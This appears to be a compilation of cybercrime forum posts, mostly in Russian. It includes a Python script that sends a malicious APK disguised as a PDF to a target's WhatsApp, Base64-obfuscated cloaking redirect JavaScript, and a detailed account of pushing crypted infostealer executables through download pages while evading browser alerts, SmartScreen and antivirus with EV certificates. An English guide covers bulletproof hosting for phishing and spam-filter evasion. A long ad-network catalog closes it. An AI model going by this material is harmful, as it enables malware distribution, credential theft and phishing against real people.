Нажмите кнопку «Add Instance» (Добавить экземпляр) и создайте новый экземпляр.
Шаг 3:
Заполните соответствующие поля в файле wp.py
сгенерированной информацией об
API и войдите в своё приложение WhatsApp, используя QR-код, найденный в
информации об экземпляре.
Шаг 4:
Введите целевой номер в поле «enter number» (введите номер) и загрузите ваш
файл на сервер (это может быть ngrok или python сервер. Если вы тестируете
локально, вы можете использовать XAMPP).
Шаг 5:
Запустите Python-код и наблюдайте за отправкой сообщения.
Python:Copy to clipboard
import requests
import json
url = "https://api.ultramsg.com/instance../messages/document"
payload = {
"token": "ultramsg token",
"to": "enter number(target number)",
"document": "your host(ex:https://08f8-185-177-126-102.ngrok-free.app/up/test.apk.)",
"filename": "Test.PDF",
"content_type": "application/vnd.android.package-archive",
"priority": "10",
"referenceId": "",
"msgId": "",
"mentions": ""
}
headers = {'Content-Type': 'application/json'}
response = requests.request("POST", url, data=json.dumps(payload), headers=headers)
print(response.text)
Как получить первый траф без вложений? Куда лить? С какого источника проще
получать?
Как получить первую монетку?
Здравствуйте, подскажите пожалуйста люди которые разбираются. Есть ли сейчас на рынке хорошие инструменты помощники в работе с мессенджером? Неделю ресерча не нашел ничего достойного. Мой запрос очень простой
Спам 1000+ человек с моих аккаунтов
Мне нужно что-б аккаунты не забанили после рассылки, что-б можно было пользоваться дальше. Спам по личным сообщениям пользователям, а не по группам! Или все же проще с кодером словить связь?
Прошу подсказать у когого был такой опыт по парсингу или другому способу вытащить корп почты с логов
Простой способ продлить жизнь домена и компании в Facebook, это зашифровать JS редирект вашей клоаки.
Кликабельно : Качественные Facebook БМ'ы с суточным лимитом на открутку рекламы в 250$
Способ работает одинаково как при JS клоакинге через Keitaro, так и через JS клоакинг IM KLO и другие клоаки.
Все очень просто, идем в любой сервис конвертер Base64:
Вставляем туда код редиректа, в случае IM KLO это:
JavaScript:Copy to clipboard
<script src="http://*****.**/tracker.js"></script>
В случае Keitaro:
JavaScript:Copy to clipboard
<span id="fb334997-3e9e-9cd6-2ddb-bb64fb6762eb"></span><script type="application/javascript">
var d=document;var s=d.createElement('script');
s.src='//******.ru/pQCb4S?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm5eec95320e83b=script5eec95320e83c&_cid=fb334997-3e9e-9cd6-2ddb-bb64fb6762eb';
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
if (document.location.protocol === 'https:' && '//******.ru/pQCb4S?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm5eec95320e83b=script5eec95320e83c'.indexOf('http:') === 0 ) {alert('The website works on HTTPS. The tracker must use HTTPS too.');}
</script>
Получаем код:
Вставляем полученный набор символов в тело страницы при помощи код ниже:
JavaScript:Copy to clipboard
<script>
var string = 'Ваш закодированный JS';
var decodedString = atob(string);
document.write(''+ decodedString +'');
</script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.0/jquery.min.js"></script>
Или этого:
JavaScript:Copy to clipboard
<script>
let encoded = 'Ваш закодированный JS';
let decoded = atob(encoded);
document.write(''+ decoded +'');
</script>
Готово
**
SOURCE :LINK
Кликабельно :** Качественные Facebook БМ'ы с суточным лимитом на открутку рекламы в 250$
Всем привет. Сегодня я расскажу вам про свой работы с логами. Я не провозглашаю себя как спеца в этой области, лишь хочу рассказать свой опыт, который обошелся мне в 50 000$ тестов. И я буду искренне рад, если этот опыт поможет кому-то сэкономить хотя бы доллар. В замен ничего не прошу, но если я вам помог этим постом избежать каких-то ошибок, то дайте знать, поставив +репу) Так же, если ты знаток в этой области, то буду рад, если ты меня поправишь в каких-то моментах или скажешь, где и что я не так понял.
*Все цифры приводятся, ориентируясь на траф с фб.
Начнем.
Здесь я не буду рассказывать про то, как лить инсталлы с паба или с биржи. Это и так все знают. Берешь арендуешь стилак, криптуешь ехе и отправляешь его пабу или в биржу. Такие инсталлы я считаю помойкой. Люди даже не понимают, что они льют отработку (как это не понимал и я). 95% пабов будут лить вам отработку. Остальные 5% в скором времени начнут. Но даже в таком трафе можно отрабатывать себе в плюс и как то окупать затраты на пролив. Мне повезло найти паба, у которого траф был более менее. На нем я и заработал свои первые достойные деньги. Сейчас этот паб поставляет качество в 2-3 раза хуже чем раньше.
Сегодня я расскажу как лить инсталлы самому на себя, которые будут уникальными и полностью в вашем владении. Я считаю, что это вершина. Ведь если ты добываешь инсталлы сам, то ты ни от кого не зависишь. А не зависеть ни от кого
Моя картина выглядела такой. Я лью инсталлы с фб на себя. В логах точно будет много фб, с которых я буду отливать инсталлы. (некий бесконечный оборот инсталлов) + буду отрабатывать на коши, амаз и тд. Однако реальность оказалось совсем другой)
И так. Как я начал.
1. Я взял, арендовал стилак, допустим Ракун.
2. Купил у человек готовый ленд под инсталлы.(неважно какая тематика ленда,
главное - что там есть кнопка ,,скачать,, ).
3. Закриптовал ехе от стилака и поместил его на свой ленд на кнопку
,,скачать,,.
4. Установил все отслеживающие метрики на ленде, что бы понимать что
происходит и видить статистику скачиваний.
5. Дал траф с фб на свой ленд.
Итог: Скачивание с ленда мне стоило 1-2 бакса по ЮС, однако в панель стилака стучало всего 5% от тех, кто скачал. Я был в недоумении, как такое может быть. Потом начал разбираться.
1.Google alerts
Первое что происходит с файлом при скачивании - это проверка браузером его на вирусы.
Вот причины вывода алерта гугла:
1 Алерт: Алерт хрома "файл качают редко"
2 Алерт: Алерт хрома "файл возможно вредоносный"
3 Алерт: Алерт антивируса на скане (просто палит файл без запуска)
4 Алерт: Алерт смартскрин
5 алерт: Алерт uac
6 Алерт: Алерт антивируса рантайм (после того как файл начинает работать и
антивирус распознает подозрительную активность).
Я начал думать как это обойти. По Итогу пришел к такому выводу:
1 Алерт: Обойдет качественный крипт ехе + EV серт
2 Алерт: Обойдет качественный крипт ехе
3 Алерт: Обойдет качественный крипт ехе
4 Алерт: EV серт фиксит
5 алерт: EV серт фиксит
6 Алерт: Зависит уже от файла стилака или ботнета. Советую использовать
приватных типов, либо самопис.
Так же Алерт можно обойти, если файл ехе упаковать в .zip + раздуть его (наполнить мусором для полноты). Или завернуть в .iso размером 600+мегабайт. Или .msi размером 300+ мегабайт. Так же пробовал упаковывать ехе в зип + дискорд или какое-то облако для файлов.
_Но скажу на будущее. Все эти варианты правда обходят алерт гугла, но вот только ваш отстук увеличиться на 5-10%.
Наш вариант - это чистый ехе, который правильно закриптован и обернут ev сертификатом._
Через меня прошло 20+ человек, которые загоняли мне, что с их .iso файлом отстук будет 50%+ и тд. Но у каждого отстук был не больше 10%.
2. ЮАК и Смартскрин
Даже если вы обошли алерт гугла, то дальше вас ожидает ЮАК и Смартскрин.
Юак будет зелёным с сертом или его не будет вообще.
Смарт всегда выглядит одинаково и это страшная вещь, обходится ev сертом.
3. Антивирусы
После этого нас ожидает защита от антивирусов. На самом деле, антивирусы включаются в работу уже на моменте скачивания файла. То есть из за ав так же может быть гугл алерт).
при запуске файла может быть 2 варианта детекта:
- когда ты 2 раза клацнул и тебя сразу ав послал нахуй, сказав что это вирус
- когда ты 2 раза клацнул, все ок, а через 2-10 секунд детект
первый вариант - хуевый крипт
второй - хуевый софт
Паблик софт, какой бы там не был кодер крутой, скиловой и все такое - его использует много людей.
много людей = много файлов на реверсе
много файлов на реверсе = быстрый детект
приват всегда лучше
Важно понимать:
- рантайм показатель зависит от софта
- скантайм показатель зависит от криптора
именно поэтому лучше использовать приват софты или самопис.
АВ же обходятся хорошим криптом + ev сертом.
Проблема в том, что вы можете заплатить нехилые деньги за крипт + ев серт (стоит он от 4к долларов), пройти всю защиту и вам не вылетит ни одной ошибки. Но на 100-200 инсталле какой-то ав пробъет вашу защиту и ваш ехе будет палиться на каждом запуске. Или кто то решит пожаловаться на ваш файл и ev серт спадет.
Здесь нужно взвешивать все за и против. И я считаю, что стоит подходить к этому делу серьезно, только если у вас есть хорошая связка, которая дает вам дешевые скачивания и вы можете лить объемы. Если вы не вывозите по бюджету, то ищите партнера, что бы каждый отвечал за свое ремесло. Например, как это было в моем случае. Я отвечал за траф и связки. Партнер отвечал за отработку, ев серты, крипты и тд. При том, что у него самопис ботнет + хвнц + лоад. В общем полный пак. На выходе вы от него должны получить просто ссылку на прямое скачивание ехе файла.
4.Боты
В начале я лил вообще без клоаки, даже и не подозревая, что боты гугла и фб могут зайти на мой сайт, скачать ехе и проверить его. Это для меня было в новинку) Позже мне объяснили, что боты везде и повсюду и делают много задач, например, вы сейчас сидите за пк, серфите браузер, а бот браузера, или битдефа, ходит за вами, и сливает все ваши дрифты по интересам. Так же и на скачке. Всех людей сопровждают боты. С одного ипа на .txt только гляньте сколько входов, по 4-5. Это не реальный пользователь делает, а боты внутри его экосистемы. Это первое. А второе это еще ондрайв, если жертва авторизирована в майкрософте, то там ваще целая наука))
После этого я начал использовать клоаку. Но как оказалось, обычной клоаки недостаточно. Нужна мощная кло, которая опознает фингер и действия бота. Но в начале можно обойтись и обычной кло.
Про опыт:
Сначала я пытался все делать сам и лить сам на себя, но понял, что я много чего не понимаю и не знаю как пофиксить.
Потом я решил отвечать только за трафик и найти человека, кто будет отвечать за отстук и тд.
Я перепробовал 20+ людей и встретил только 2-х, кто дал показатели выше 20% процентов отстука. Максимум что я видел - это 50% отстука.
Официально заявляю, не пробуйте лить без ев серта. Так же не лейте на паблик софты по типу стилака редлайна, тк траф у вас уникальный и дорогой, советую не скупиться на ботнете с хвнц. Так же вам нужно найти приватных крипторов. Лучше несколько, тк каждый криптор бывает под разные задачи.
Не надейтесь что отстук вырастет со временем. Обычно первые 100 инсталлов покажут вам максимальный отстук.
Выводы:
1.Не пытайтесь лить траф на .iso .msi .rar . zip и тд. Лейте только на ехе, который скачивается сразу после нажатия пользователем на кнопку ,,скачать,,. Сделаете иначе - получите отстук не больше 20%.
2. Лейте только на файл, который подписан EV сертификатом. Этот пункт еще важнее чем первый. Не путайте EV серт с AV. Вам нужен именно EV.
3. Не лейте на тех, кто использует паб стиллеры, ботнеты и тд. Файл там будет загажен. Ищите серьезных людей, у которых есть ев, самопис ботнет +хвнц и тд.
4. 90% тех кто проливается на биржах или у пабов вообще понятия не имеют как правильно лить траф на свой ехе. Поэтому, говорю вам. Даже не пробуйте с ними работать.
За все это время я смог научиться отличать балаболов от знатков. Я прошел больше чем через 20 человек которым лил траф и нашел только 2-х толковых, кто понимает в этом деле. Кстати, именно у них у меня был максимальный отстук.
Определитесь кто вы:
Если вы траффер , то отвечайте за траф. Ваше дело найти рабочую связку и знать как давать стабильные объемы. Тк ев серт не вечен, и не дешев, то тут надо рассчитывать от 1к кликов ЮСЫ в сутки (как минимум). Ориентируйтесь на такие цифры: ЮСА от 1к кликов в сутки. Цена за клик не дороже 3$. (естественно все зависит от качества)
Eсли вы технарь , то ваше дело - сделать максимально высокий отстук файла. Знать приватных крипторов. Знать где стабильно добывать ЕВ серты. Иметь приват или самопис Ботнет и тд. Но тут не мне вас учить, потому что, если вы это умеете, то вы уже опытный и скиловый человек в этом деле.
Сам я кодер, в арсенале имеется приватный самопис стилер, очень хорошая база, в некоторых аспектах превосходит паблик стиллеры. Хочу узнать у людей, с чего начать, чтобы начать получать с него $. Куда лить траффик, на что лить, как логи превращать в $? Хочу по полной влиться в данное дело, работать хочу в соло (сам пишу софт, сам распространяю, сам получаю $). Цель - ежемесячный доход от 1к, никаких супердоходов с него не планирую. Может, какие-то статьи посоветуете для старта? Прошу помощи у знающих людей.
Hey Fam!! To I Am Going To Explain How To setup Host for spamming and Configure your Bulletproof Hosting VPS H-Panel Of Your Choice?
Setting up a Virtual Private Server (VPS) involves several steps. Below is a general guide on how to set up a VPS host. Note that specific steps may vary depending on your VPS provider and the operating system you choose. This guide assumes you have already acquired a VPS subscription.
You need putty or wls to access your vps and configure your Host-Lab-Panel
It's good advice to check the reputation of your VPS host's IP address, especially if you're planning to use it for email services or other online activities. Services like Spamhaus maintain blacklists of IP addresses known for sending spam or engaging in malicious activities.
If you find that your VPS host's IP address is listed on a spam blacklist, it's important to take action to resolve the issue. Here's a more detailed guide on what you can do:
1. Check IP Address Reputation:
Visit the Spamhaus website or use their services to check the reputation of
your VPS host's IP address: Spamhaus Blocklist Removal Center.
2. Confirm the Blacklist Status:
If your IP address is listed, carefully read the information provided to
understand the reason for the listing.
3. Contact Your VPS Provider:
Open a support ticket with your VPS hosting provider.
Provide them with details about the blacklisted IP address and request
assistance in resolving the issue.
4. Request an IP Address Change:
If the IP address is consistently blacklisted, you might consider requesting a
new IP address from your VPS provider.
5. Improve Security:
Evaluate and improve the security of your VPS to prevent future issues.
Ensure that your server software is up to date and secure.
Implement strong authentication mechanisms.
Regularly monitor your server for suspicious activities.
6. Verify Removal from Blacklist:
After taking corrective actions, use the Spamhaus website or similar services
to verify that your IP address has been removed from the blacklist.
7. Implement Best Practices:
Follow best practices for securing and maintaining your VPS to avoid future
blacklisting.
8. Monitor Regularly:
Periodically check the reputation of your IP address to catch any issues
early.
Remember that actively addressing blacklisting issues is crucial for
maintaining a good online reputation and ensuring that your legitimate emails
or services are not affected.
Waht's Next..............
1. Log in to Your VPS Provider's Dashboard:
Access the dashboard provided by your VPS hosting provider using the
credentials they provided.
2. Select and Deploy a VPS Instance:
Choose the specifications for your VPS instance, such as the operating system,
resources (CPU 4, 8 GB Memory, 60 GB Storage, 10 Gbps DDOS Protection, Ubuntu
20.04 or 22.04), and data center location.
Deploy the VPS instance.
3. Access the VPS via SSH:
Once deployed, connect to your VPS using SSH. Most VPS providers offer an SSH
key or a password-based authentication method.
bash
Copy code
ssh username@187.87.94.89 Next prompt do not
panic type yes and copy and paste your vps passwords!
4. Update and Upgrade Packages:
Update the package lists and upgrade the installed packages.
bash
Copy code
sudo apt update
sudo apt upgrade
5. Secure Your VPS:
Change the default SSH port for added security.
Set up a firewall to control incoming and outgoing traffic.
6. Configure Timezone and Locale:
Set the correct timezone and locale for your server.
bash
Copy code
sudo dpkg-reconfigure tzdata
sudo dpkg-reconfigure locales
7. Setup hostname:
Type this commandline below:
bash
copy code & paste
sudo -i
hostnamectl set-hostname node.xss.tld
to confirm this command if your hostname added to your server use this command
below
$> hostname > hit enter
8. Domain Configuration (Optional):
If you have a domain, configure DNS settings to point to your VPS IP address.
9. SSL/TLS Configuration (Optional):
If applicable, set up SSL/TLS certificates for secure connections.
10. Regular Backups:
Implement a backup strategy to protect your data.
11. Monitoring and Maintenance:
Set up monitoring tools and perform regular maintenance tasks.
After this Configuration update/upgrade you do not install whm. i don't use that. use this resource called hestia(dot)com, how to configure H-panel
Step 1-
Download the installation script for the latest release:
bash
copy code and pasge to terminal
$> wget <https://raw.githubusercontent.com/hestiacp/hestiacp/release/install/hst- install.sh>
If the download fails due to an SSL validation error, please be sure you've
installed the ca-certificate package on your system - you can do this with the
following command:
bash
copy code to your commandline:
$> apt-get update && apt-get install ca-certificates
Step 2: Run
To begin the installation process, simply run the script and follow the on-
screen prompts:
Bash
copy code to your terminal:
$> bash hst-install.sh
if you face error use this command
bash
copy code
$> bash hst-install.sh --force
What’s next?
By now, you should have a Hestia installation on your server. You are ready to add new users, so that you (or they) can add new websites on your server.
To access your control panel, navigate to https://host.domain.tld:8083 or http://your.public.ip.address:8083, copy the url and save to your notepad. then paste to your browser use firefox browser, do not panic when you see security warning, click proceed and use your login info passwords and admin default username.
Next Buy your domains from provider you wish but careful some domain providers not support spamming and they monitor new domains. here is trick i used after purcahse domain.
example of my domain for office 365/ Credit Card for Netflix or Amazon
Domain 1- offsite2.net or .info, kindly use subdomain finder script and then pick your custom domain from subdomain you found to antispam webmail to scan then if they are clean domain!....
Here i will not connect this domain to HestiaCP directly, Please Go to Dns advance then click add new recod a' generate string btc code
example in your dns advanced record: host @- type this in your textbox 365jsdviyreiugr |IP user your vps ip:187.87.94.89 | click saved
Then your domain will called subdomain it will look like this example> 365jsdviyreiugr.offsite2.net, Do not add your domain.com directly to your hestiacp user. it's just a trick to overlook by antispam domain checker.
What's Next to know about spamming before sending out your letter+link:
Never buy smtp without get all needed info. because many smtp from seller it's cracked, so make sure you have your host vps config and install Host-panel script on your vps. then get below list down before buying smtp.
1- Make sure you user fresh uncommon contents in your html letter for email &
sms spamming, never use old html letter or common contents in sms or html
letter.
2- Make sure you use unique sender name and subject words. to byapss smtp bot
scam, spam filtering, isp bot scan etc...
3- Make sure you encrypted your letter and filter bad words. here is free
manual encrypted "­" place this ­ between 2 to 3 letter words in your
html letter.
4- make sure you mask your phishing link and add redirect bypass again bad
visitor users, like vpn,bot,webroot etc..
5- If your smtp limit is 5k or 10k never send the accurate limit in aday or in
an hour, because it's hacked and owner might used before you. sendout max 500
to 2.3k to avoid trigger antispam security.
Next.........
For Beginner's what kind of tools needed for spamming | CC | O.365 | Business Webmail | Bank | USA & Canada & Australia....!
1- vps host
2- scampage script
3- email sender
4- smtp
5- mask fudlink and ope redirect
6- letter encryptor
7- sms sender
8- smtp to sms or gateway api- but i recommended smtp to sms.
9- buy professional domain
10- Scampage obfucation scampage script unscape.(qbot)
11- Leads - either phone number or email
12- debounce back validate make sure you purchase with new apikey.
13- sms phone number validator
14- Telegram Bot is the best for results panel.google how to create telegram
bot.
15- Leads sorted.
16- RDP with proton vpn or pia vpn
Happy phishing and and hacking xss.is Fam!!
Whoami pen tester and professional IT security for living!...
Next tutorial we be post, how to get smtp with private combos using open
source tool!
I teach private spam class and make custom page, hire me for your advance spamming setup or help you fix your spamming issue!
Всем ку, кто подскажет рекламную сеть для точечного таргетинга? Знаю, что некоторые рекламные сети позволяют даже указать определенный диапазон IP, чтобы конкретно там показывался рекламный баннер. Почему интересуюсь, потому что таким способом можно получить доступ пк сотрудников нужных тебе компаний.
Author: @tethersecurity
Start date: 10.11.2023
You must have at least 5 reaction(s) to view the content.
Spoiler: warning!
PS: i'm not responsible for the quality of a course since i don't know the
author. First part must be in telegram chanel.
PSS: leave a like if it was helpful
**Где искать аудиторию под азиатский трафик **? Льешь на на Финляндию, Вьетнам или Австрию? Найди соц.сеть с подходящей аудиторией.
1. Ameba — Японская социальная сеть, своего рода блог-платформа с играми.
2. Copainsdavant — Крупнейшая социальная сеть во Франции, после Фейсбука и
Ютуба. Позволяет найти одноклассников.
3. Irk Galleria — Социальная сеть популярная в Финляндии. Чем-то напоминает
смесь Одноклассников и Мамбы).
4. Nasza Klasa — Польская социальная сеть для одноклассников, с рекламой.
5. Nexopia — Социальная сеть построенная на базе форумов, популярна в Канаде.
6. Plurk — Социальная сеть в Тайване, для обмена короткими сообщениями.
7. Signal — Мессенджер с открытым кодом на Github,который ценит приватность.
Не нужно вводить номер телефона, имя и другие личные данные.
8. Skyrock — Французская соц.сеть.
9. WeChat — популярная в Китае соц.сеть с покупками и обменом сообщениями.
Есть англоязычная версия.
10. Weibo — ТОП соц.сеть Китая, насчитывает порядка 300млн пользователей.
11. Wer-kennt-wen — Немецкая соц.сеть и сообщества, с трафиком из Германии,
Австрии и Швейцарии.
12. Zing — Соц.сеть во Вьетнаме, которую читают чаще, чем локальный
Фейсбук.
Каталог тизерных сетей для слива трафика в CPA.
Тизеры размещаются на новостных сайтах, витринах, блогах и кино сайтах,
тизерные сетки всячески привлекают новые площадки для размещения. В нашем
каталоге кроме известных
русскому арбитражнику тизерок, есть американская тизерная сеть, и даже белая
тизерка) Вы можете оставить отзывы о работе с сеткой в коментах под
статьей.
13. ActionTeaser — Тизерка с аукционной моделью оплаты.
Запрещен адалт, смс, мошен.реклама. Доступен ретаргетинг.
14. AdBlade — Зарубежная рекламная сеть с тизерами и
нативной рекламой.
15. Adlabs — Тизерная рекламная платформа с русскоязычным
трафиком. Среди сайтов-партнеров такие ресурсы, как ЯП, КП, Зайцев.нет и
другие.
16. Ads.Red — Тизерная сеть с детальным таргетингом, аукционом и приятными ценами.
17. AppSter — Продают адалт трафик. Запрещена реклама WAP и вирусов. Трафик СНГ.
18. Bidvertiser — Американская тизерная сеть, с нативной рекламой и попандерами.
19. Directadvert — Тизерная и рекламная сеть с 15к площадок по всему Рунету.
20. Exoclick — Адалт тизерная сеть с зарубержным трафиком.
21. Kadam — Одна из самых первый тизерных сетей, которая разрослась до баннеров, пушей и даже своих офферов.
22. MediaVenus — Тизерная сеть специализируется на товарке, нутре, адалт товарке, инсталах и дейтинге.
23. MGid — Недавно тизерная сеть MarketGid обновила дизайн, объединилась в MGid и стала рекламной сетью.
24. Oblivki — Тизерка, которая следит за чистотой офферов и проходящего
трафика. Показывает рекламу в формате
native advertising ( небольшая картинка и рекламный текст).
25. RedTram — Тизерка с трафиком РФ, РБ, КЗ, которая ведет свою новостную витрину с тизерами под своим брендом.
26. TeaserMedia — Есть предпросмотр форматов тизера до запуска кампании,
больше 20 категорий партнерский сайтов,
оплата только за уникальный клик. Охват по тизеру зависит от CPM.
27. Teasernet — После ребрендинга и редизайна, тизерная сеть расширила свои
возможности и предлагает 7 новых
рекламных форматов на любой вкус.
28.TrafficHunt — Тизерная сеть по адалт трафику с недавних пор, запустившая и пуш-уведомления.
29. Visit Web — Тизерная сеть с белым и адалт трафиком. С недавних пор
появились и пуши, но сетка специализируется
на тизерах. Есть возможность посмотреть среднюю цену клика за последний час.
Каталог рекламных и баннерных сетей. Бурж и СНГ рекламные сети
** Ниже собрана подборка живых рекламных и баннерных сетей. Где найти
американскую рекламную сеть? Все популярные бурж сетки в одном каталоге. Нужна
баннерная сеть с белым**
бурж трафиком? – выбирай из списка, какая тебе приглянется, и обязательно
напиши комент, о работе с выбранной сеткой.
30. Adbuff — Позиционируют себя как альтернатива AdSence) Минимальный бюджет для входа $1000.
31. AdCash — Бурж рекламная сетка, поддерживает форматы: баннеры, нативную рекламу, пуш-уведомления, in-app, pop- under
32. AdClickMedia — Баннерная, тизерная зарубежная рекламная сеть, с оплатой
CPM, CPC.
Предлагает рекламироваться на сайтах с тематикой: заработок на
дому,саморазвитие, здоровье и фитнес, канабис, финансы и
крипта. Минимальная стоимость запуска кампании 5$. Помимо стандартных
баннеров, поддерживает и email рекламу.
33. Admachine — Мобильная рекламная сеть с pop, нативной, видео и банерной
рекламой, push уведомлениями,
поддерживают iOS, Android, Windows, Mac OS.
34. AdMedia — Глобальная рекламная сеть с внушительными инструментами
таргетинга и настройки кампаний. Предлагает
мобильный и десктопный трафик, поддерживает баннеры, натив, рекламу в
поисковиках, remarketing, display и
email рекламу.
35. Adpushap — Рекламная сеть с финансовой поддержкой Microsoft, предлагают
свои уникальные рекламные форматы,
которые проходят без "банерной слепоты" и обходят блокировку AdBlock. Открыто
публикуют успешные кейсы, как
отработала реклама различных видов бизнеса в США (в примерах недвига, аренда
авто, конференции).
36. AdsTargets — Размещают рекламу на партнерских сайтах и в своем
поисковике, из рекламных форматов поддерживают
баннеры, ссылки, рекламу приложений.
37. Adstera — Платформа для рекламы в форматах: native,
баннеры, push уведомления, popunder, ссылки, pre-roll
видео.
38. Aidem — Белая зарубежная рекламная сеть, для рекламы приложений на таких ресурсах как Quora, ProductHunt, Rumblr
39. BlogAds — Рекламная сеть специализируется на рекламе
в зарубежных блогах, форумах и сообществах.
40. BodyClick — Рекламная сеть с тизерной, flash, slide, clickunder и
банерной рекламой. Сетка предлагает
русскоязычный трафик, детальную статистику по каждому клику, оплату за
уникальные переходы и оперативную поддержку.
41. ClickAdu — Премиум рекламная сеть, с моделью Smart CPM и рекламными форматами popup, popunder, skim, push up, pre-roll и пуш уведомления.
42. Dedicated Email — Американская рекламная email сеть, продает трафик по своим email базам.
43. FrogyAds — Датская рекламная сеть, предлагает натив,popup, popunder,
пуши, классические баннеры, видео
рекламу, interstitial рекламу (встроенная в ролик с кнопкой Skip in...). 480
млрд взаимодействий с рекламой в
сети, ежемесячно (как указано на странице кампании), ребята рекомендуют к
продвижению свипстейк офферы,
казино, дейтинг, андроид инсталы, игры, e-commerce. Модели оплаты CPM, CPC,
CPV (visitors).
44. HillTopAds — Бурж сетка, не слишком публична в СНГ сообществе и тем не
менее, пользуется популярностью среди
вебов. Предлагает пуш уведомления, видео рекламу, popup, popunder, нативную
рекламу, ссылки и display баннеры.
45. Infolinks — Рекламная сеть США с форматами: skin page, нативная
https://piratecpa.net/ реклама, встроенный
в ссылку баннер view, стикер и другие.
46. Media Net — Рекламная сеть публикует рекламу в поисковиках Yahoo, Bing.
Рекламные баннеры крутятся в
журналах Forbes, Elle, Reuters, Cosmopolitan, Esquire. Доступные рекламные
форматы: контекст, нативная реклама, display.
47. Midroll — Бурж рекламная сеть с рекламой в европейских и американских подкастах.
48. Mpay69 — Рекламная кликандер сеть с адалт трафиком.
49.PropellerAds — Пуш, баннер-, кликандер- рекламная сеть, с сильной
поддержкой молодых вебов.
Вебинары, онлайн консультации, подсказки сапорта 24/7 и полная база знаний
по рекламе. Простой кабинет для работы и гибкая
настройка таргетинга. Впрочем мы писали об этой сети, можете познакомиться
ближе.
50. Ungads — Новая рекламная сеть с пуш уведомлениями, баннерами, пре-
роллами, popunder и нативной рекламой.
Предлагают ускоренную модерацию (до 20 минут), и гибкие правила прохождения
модерации.
In-app и мобильные рекламные сети. Где купить мобильный трафик?
51. AdAction — In-app зарубежная сетка, предлагает рекламу в iOS, Android приложениях.
52. Admob by Google — Платформа для рекламы в мобильных Android приложениях от Google.
53. Airpush — Мобильная рекламная платформа, с новым форматом push
уведомления. Поддерживает in-app, видео
баннеры, overlay, абстрактные баннеры.
54. AppNext — Мобильная рекламная сеть, которая помимо in-app трафика
захватила мобильные устройства и
предлагает мобильные видео с CTA, full-screen mobile ads, виджет с каруселью и
карусель приложений встроенную в страницы сайта.
55. Cross Install — Американская in-app рекламная сеть, с удобной
настройкой под любой формат смартфона,
персонализацией под выбранную аудиторию с рекламой в iOS и Android
приложениях.
56. Duapps — Китайская рекламная сеть по in-app трафику, поддерживает
платформы: iOS, Android, Unity и рекламные
форматы Banner, Video, Native, Interstitial, Trigger, Offer Wall.
57. Leadbolt — Зарубежная мобильная рекламная сеть с in- app и мобайл
трафиком по всему миру. Модели оплаты CPI,
CPC, CPM. Рекламные форматы: мобильные видео баннеры, нативная реклама, in-app
баннеры, интерактивные баннеры
58. MyAppFree — Глобальная in-app рекламная сеть с трафиком из мобильных приложений iOS, Android, Windows Phone платформ.
59. YouAppi — In-app рекламная сеть с видео, нативными и статичными баннерами, для рекламы в приложениях
Каталог Adult рекламных сетей. Где взять adult трафик недорого?
60. Adxxx — 960 млн показов в день, адалт товаров и услуг. Рекламная сеть с трафиком для взрослых.
61. Adamo Advertising — Адалт рекламная сеть, которая предлагает динамичную рекламу, баннеры и pop-сайты.
62. EroAdvertising — Рекламная сеть из Нидерландов, специализируется на адалт
трафике, предлагает мобильные и
десктопные рекламные форматы, гибкий таргетинг.
63. JuicyAds — Сочная рекламная адалт сеть)) с нативочкой, попандерами и классической баннерной рекламой для взрослых.
64. Plugrush — Автоматизированная рекламная сеть с ускоренной модерацией, простой в управлении настройкой кампаний и классическими баннерами.
65. Pushy Ads — Монетизация адалт трафика через пуш уведомления.
66. Slimspots — Рекламная сеть с адалт трафиком, ирекламными форматами: popup, popunder, баннеры и редиректы.
67. Traffic Factory — Рекламная сеть адалт направления, с гибкой
настройкой таргетинга и корректировкой ставок в
реальном времени, что позволяет получать больше трафика за конкурентную цену.
68. Traffic Force — Adult рекламная сеть с 16 млрд взаимодействий
ежемесячно. Display, Pop-under, Pre-roll
видео, пуш-уведомление – топ рекламных форматов в сети.
69. Traffic Shop — Адалт рекламная сеть ориентированная под мобильный
трафик. Поддерживает рекламные форматы:
popunder, баннеры и skimm.
70. TrafficJunky — Канадская рекламная сеть премиум адалт трафика, в том числе и на PornHub.
71. Tube Corporate — Еще одна адалт рекламная сеть с горячим трафиком 18+,
предлагает трафик из 10 популярных
сайтов для взрослых, рассылку пуш уведомлений, VIP сервис для премиум
рекламодателей и гибкую систему рейтингов и
дисконтов для ставок.
Список Popunder рекламных сетей. Купить трафик popup, pop, popunder.
72. Popads — Рекламная сеть popunder трафика.
73. PopCash — Popunder рекламная сеть с минимальным пополнением от 5$.
Доступна 24/7 поддержка, анти-фрод система, полное управление и настройка
рекламных
кампаний, удобный интерфейс, ускоренная модерация.
74. PopMyAds — Попандер рекламная сетка с базовым набором настроек,
минимальными пополнением от 25$, аукционными
бидами и стандартным таргетингом.
75. Popunder — Попандер рекламная сеть, которая с недавнего времени подключила 12 новых рекламных форматов. Модель оплаты CPC, CPM.
76. Popunder Total — Премиум попандер сеть со своей RTB системой,
круглосуточной поддержкой, ускоренной
модерацией, низкими ставками и расширенной настройкой таргетинга.
Каталог пуш рекламных сетей. Трафик с push уведомлений.
77. Admaven — Сетка позиционирует себя как full-stack рекламная платформа, с
одним из направлений push-
notification, 2,5 млрд взаимодействий, отзывчивым сапортом и простотой в
настройке кампаний.
78. Clickstar — Платформа создана для монетизации своего трафика через пуш-
уведомления, на покупку пуш трафика и с
недавних пор, Clickstar позволяет рассылать пуши по своей собранной базе
пользователей.
79. DaoPush — Новый игрок в мире пуш уведомлений, а потому ребята часто
раздают промокоды и всячески помогают
с запуском кампаний. Интерфейс стандартный, объемы трафика обновляются,
цены за клик чуть ниже средних.
80. Datspush — Пуш сетка от партнерской программы Leadbit, вышли в паблик
прошлой осенью. Открытый объем
трафика, аукционная модель показа уведомлений. Сетка балансозависимая,
пропускает адалт офферы.
81. Evadav — Рекламная сеть с множеством форматов, и уже полюбившаяся
зарубежным арбитражникам, с недавних пор
делает акцент на трафике с пуш уведомлений. Стоит присмотреться арбитражникам
для рекламы дейтинга, казино
и свипстейк офферов.
82. Ezmob — Кросс-платформа с рекламными форматами: popunder и push- уведомления, ссылки и дисплей баннеры.
